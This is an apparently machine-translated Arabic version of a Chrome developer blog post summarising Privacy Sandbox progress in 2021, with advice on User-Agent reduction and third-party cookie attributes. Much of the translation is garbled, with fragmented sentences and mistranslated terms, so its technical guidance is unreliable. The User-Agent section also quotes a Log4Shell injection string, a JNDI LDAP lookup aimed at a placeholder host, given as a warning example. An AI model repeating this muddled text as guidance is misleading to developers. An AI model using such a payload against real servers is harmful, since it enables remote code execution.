مرحبًا بك في الإصدار الختامي لعام 2021 من سلسلة "التقدم في الخصوصية" وضع الحماية، فإن تتبع المعالم الرئيسية على إلى الإيقاف التدريجي لملفات تعريف الارتباط التابعة لجهات خارجية في Chrome والعمل من أجل تطوير والويب الخاص. نشارك عادةً نظرة عامة على تحديثات مبادرة حماية الخصوصية المخطط الزمني بالإضافة إلى الأخبار من للمشروع، لكن ديسمبر كان شهرًا هادئًا. بدلاً من ذلك، سنلقي نظرة على بعض الأنشطة على مدار عام 2021 وتقديم بعض القرارات المحتملة التي يمكنك اتخاذها وها نحن الآن في العام الجديد.
عملية تطوير Chromium
للحصول على ميزة جديدة للنظام الأساسي للويب على Chromium، يجب أن تمر عبر والتطوير المفتوح للمشروع . في عام 2021، أنتج فريق "مبادرة حماية الخصوصية" ما يلي:
🥚 | نية إنشاء نموذج أولي | 19 |
🧪 | النية في إجراء التجربة | 7 |
🚀 | نية الشحن | 11 |
يُعد كل معلم رئيسي أيضًا دعوة للمنظومة المتكاملة على الويب على نطاق أوسع من أجل المساهمة.
إنشاء نموذج أولي هو أول نقطة تفتيش، حيث يدعونا إلى إجراء مناقشة والتجريب المبكر. هذا يعني أن هناك عرضًا سيكون متاحًا على جيت هب، حيث يمكنك طرح سؤال من خلال إنشاء مشكلة أو الانضمام إلى المناقشات عروض تقديمية بمعايير للمجموعات مثل W3C مجموعة مهندسي شبكة الإنترنت (IETF). هنا أيضًا يبدأ الترميز، أي أنك تتوقع إتاحة وظائف النموذج الأوّلي لاختبار المطور بعد ميزة إبلاغنا به. الملاحظات الأولية ضرورية للتحقق من العروض وتكرارها.
نية إجراء تجربة هي خطوة اختيارية إذا أردنا طلب مرحلة التجربة والتقييم. يمكن للمطوّرين الاشتراك للحصول على المصدر. لفترة تجريبية ثم اختبارها في مرحلة الإنتاج. وهذا يطلق عليه تجربة لأن لدينا جوانب معينة من الميزة التي نريد التحقق من صحتها في بيئات العالم الحقيقي. المطورون الذين يمكنهم اختبار ومشاركة نتائج هذه الاختبارات وتقديم ملاحظات قيّمة للمساعدة في تكرار تطوير الميزة.
النية للشحن هي الإنجاز الأخير الذي يشير إلى أنّ الميزة أصبحت الآن كاملة وجاهزة للتوافر العام. بعد الموافقة على الميزة، سيتم مدمجة في إصدار قادم ثم تتقدم من خلال إصدار Canary أو إصدار تجريبي والقنوات الثابتة. من الضروري التأكّد من اختبار مواقعك الإلكترونية باستخدام Canary و الإصدارات التجريبية من Chrome للتعرّف عليها الإبلاغ عن أي أخطاء قبل وصول الميزة إلى القناة الثابتة.
الاقتراحات
يتضمّن كل عرض من اقتراحات "مبادرة حماية الخصوصية" مستودع GitHub المصاحب. حاسمة شرحًا لتلخيص الوظائف الشاملة التي يعرضها وتحديد أوجه التنفيذ من خلال المتصفحات، والمساهمات من مختلف النظام الشامل للويب في شكل مشكلات وطلبات سحب.
في 14 مستودعًا من مستودعات "مبادرة حماية الخصوصية"، حقّقنا ما يلي:
💬 | 545 | المشاكل التي تم إنشاؤها |
250 | تم إغلاق المشاكل | |
🛠️ | 261 | تم إنشاء طلبات السحب |
223 | تم دمج طلبات السحب |
غالبًا ما تكون اللغة المستخدَمة في التفسيرات والمواصفات موجَّهة للجمهور. على دراية بالمعايير وتطوير المتصفح، والتي يمكن صعبًا إذا لم تكن معتادًا عليها. ومع ذلك، فإن الهدف من التفسير هو شرح! إذا كانت هناك نقاط غير واضحة أو لم يتم تناولها، يمكنك أن تطرح مشكلة لنتمكّن من تعديل الفيديو التوضيحي وتوضيحه
درجات الدقة
التنظيف الربيعي لوكيل المستخدم
بينما كنا نجري العد التنازلي لاستقبال العام الجديد، بدأنا أيضًا العد التنازلي لكل من Chrome 100 والانخفاض التدريجي سلسلة وكيل المستخدم هذا جيد الحافز لإعادة النظر في أي استخدام لسلسلة وكيل المستخدم في التعليمات البرمجية للتحقق من يتأثر بأي من هذه التغييرات.
للعثور على هذه المناطق:
- يمكنك البحث عن
navigator.userAgent
في رمز JavaScript أو الدخول إلى عنوانUser-Agent
في رمز الخادم. - تحقق من تحليل السلسلة بحثًا عن افتراضات حول نسخة مكونة من رقمين. بالنسبة
على سبيل المثال، يجب استبدال التعبير العادي الذي يحدّد
\d\d
أو\d{2}
بـ\d+
- تحقّق من استخدامك للسلسلة في أي مكان تعتمد على:
- إصدار النظام الأساسي (نظام التشغيل)
- الإصدار الكامل من Chrome
- اسم الجهاز الجوّال
- هذه هي القيم التي سيتم تقليلها إلى سلاسل ثابتة في المستقبل. في حال حذف عليك الوصول إلى هذه القيم، ويُرجى الانتقال إلى User-Agent Client تلميحات:
هناك تعديل آخر في كانون الأول (ديسمبر) نشير إليه، إذا كنت تستخدم User-Agent Client.
تلميحات، لقد أرسلنا نية الشحن لتفعيل تلميحات التفويض إلى جهات
أصول
HTML
من خلال علامة <meta>
. على سبيل المثال:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
إذا كنت في حالة مزاجية حماسية متعلقة بالتنظيف الربيعي، فيمكنك أيضًا التفكير بدائل لاستخدام وكيل المستخدم تمامًا. إذا كنت تستخدم السلسلة ثم رصد الأجهزة الجوّالة، ثم التحقّق ممّا إذا كان بإمكانك استبداله بجهاز آخر متجاوب التصميم. إذا كنت تتحقق من اسم المتصفح وإصداره لدعم الميزات، راجع إذا كان بإمكانك استخدام ميزة اكتشاف الميزات بدلاً من ذلك
تجدر الإشارة دائمًا إلى أنّ وكيل المستخدم، مثل أي عميل قدّمه،
القيمة، ليس مضمونًا دقتها أو حتى تقديمها. أحدث Log4j
ثغرة أمنية، "Log4shell"
مثالاً على هذه الخطر. يشير هذا المصطلح إلى برنامج يضبط سلسلة وكيل المستخدم الخاصة به على
تضمين قيمة مثل ${jndi:ldap://example.com/file}
، قد يتمكن من الحصول على موقع
لتحليل ذلك بشكل نشط على الخادم.
فهرسة ملفات تعريف الارتباط
نشاط تقليدي آخر في رأس السنة هو التأكد من أنك سعيد بأنك
عدد صحي من الكعك بمكونات عالية الجودة. مع استمرارنا في التحرّك
نحو إيقاف استخدام ملفات تعريف الارتباط التابعة لجهة خارجية، عليك التأكد من
ملفات تعريف الارتباط على موقعك الإلكتروني التي ستتأثر كان عام 2020 هو الأبرز في تحقيق
أصبحت ضرورية لوضع علامة على جميع ملفات تعريف الارتباط لمواقع إلكترونية متعددة أو تابعة لجهات خارجية
استخدام
مع SameSite=None
.
يجب توفير ملف تعريف ارتباط حيث ضبطت السمة SameSite
على None
تحديث.
هناك ثلاثة طرق محتمَلة يجب مراعاتها في الوقت الحالي:
- إذا كان ملف تعريف الارتباط مطلوبًا فقط في علاقة بين شخصين والموقع ذي المستوى الأعلى،
يمكنك بعد ذلك متابعة التقدّم الذي أحرزته CHIPS
المقترح. وهذا يعني إضافة
Partitioned
إلى ملفّ تعريف الارتباط. - وإذا تم استخدام ملف تعريف الارتباط في سياق مواقع إلكترونية متعددة، ولكن فقط على مواقع إلكترونية مختلفة
تمتلكه ويديره، فيجوز أن يكون مرشحًا للطرف الأول
الإعدادات: وهذا يتطلب تحديد
مواقع إلكترونية في المجموعة وإضافة سمة
SameParty
إلى ملفّ تعريف الارتباط. - إذا تم استخدام ملف تعريف الارتباط لتقديم شكل من أشكال القيمة المشتركة على مستوى عدة موقعك الإلكتروني، افحص المجموعة الأكبر من مبادرة حماية الخصوصية اقتراحات لحل بديل لا الاعتماد على تتبُّع إجراءات المستخدم على مواقع إلكترونية متعددة
هذا هو الوقت المثالي أيضًا، إذا كنت تشعر بأنّك واعٍ بالصحة بشكل خاص. لإعادة النظر في كل استخدامات الكعك، حيث إن لدينا وصفة جيدة لتحسين ملفات تعريف الارتباط للطرف الأول أيضًا.
ملاحظات
في إطار جهودنا المتواصلة لنشر هذه التحديثات الشهرية والتقدم المحرز من خلال تهدف "مبادرة حماية الخصوصية" ككل، إلى ضمان حصول المطوّرين على المعلومات والدعم الذي يحتاج إليه. يُرجى إعلامنا بذلك من خلال @ChromiumDev Twitter إذا كان هناك أي شيء يمكننا التحسين في هذه السلسلة. سنستخدم تقييمك لمواصلة تحسين التنسيق.
يُرجى الاطّلاع على الأسئلة الشائعة حول "مبادرة حماية الخصوصية" التي مواصلة التوسّع بناءً على المشاكل التي ترسلها إلى فريق دعم المطوّرين المستودع. إذا كنت أي أسئلة حول الاختبار أو التنفيذ على أي من الاقتراحات، تعال وتحدث إلينا هناك.